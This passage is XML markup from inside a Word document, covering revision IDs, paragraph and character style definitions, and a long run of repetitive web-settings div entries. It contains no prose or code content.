    <w:rsid w:val="00B517C0"/>
    <w:rsid w:val="00B55EC5"/>
    <w:rsid w:val="00BB134D"/>
    <w:rsid w:val="00BB5008"/>
    <w:rsid w:val="00D72461"/>
    <w:rsid w:val="00EB78A4"/>
    <w:rsid w:val="00FE26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049B2D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8B8E8D9A-6EE0-411A-9866-DB6C244EED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517C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next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00B517C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E265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7246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4253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5372"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00425372"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0042537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425372"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00B517C0"/>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semiHidden/>
    <w:rsid w:val="00B517C0"/>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B517C0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00FE2659"/>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FE26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FE2659"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="en-IN"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="token">
    <w:name w:val="token"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00FE2659"/>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D72461"/>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D72461"/>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29880">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="74861720">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="95835828">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="870537854">
          <w:blockQuote w:val="1"/>
          <w:marLeft w:val="720"/>
          <w:marRight w:val="720"/>
          <w:marTop w:val="100"/>
          <w:marBottom w:val="100"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1520124290">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="177932638">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1866364629">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="57239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73051">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="152336560">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="174662129">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2069648529">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1278639086">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1604023759">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1595436012">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1809594434">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="619340626">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="589703257">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1633056600">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1420951652">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1858932769">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="964655914">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2037004080">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1815487557">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="55339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13312">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="210725281">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="632566279">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="302927291">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1044523602">
          <w:blockQuote w:val="1"/>
          <w:marLeft w:val="720"/>
          <w:marRight w:val="720"/>
          <w:marTop w:val="100"/>
          <w:marBottom w:val="100"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="791241291">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="28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419296">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="499196421">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="532576613">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1532455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0751612">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="576982656">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="597830262">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="655719765">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="808209751">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="853152982">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="516888369">
          <w:blockQuote w:val="1"/>
          <w:marLeft w:val="720"/>
          <w:marRight w:val="720"/>
          <w:marTop w:val="100"/>
          <w:marBottom w:val="100"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2112508855">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="128380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78500">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="928657670">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="126244951">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1415325305">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1120952736">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="798374514">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1789856595">
          <w:blockQuote w:val="1"/>
          <w:marLeft w:val="720"/>
          <w:marRight w:val="720"/>
          <w:marTop w:val="100"/>
          <w:marBottom w:val="100"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1818110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102030">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="970599889">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1001473183">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1037507744">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1081948085">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
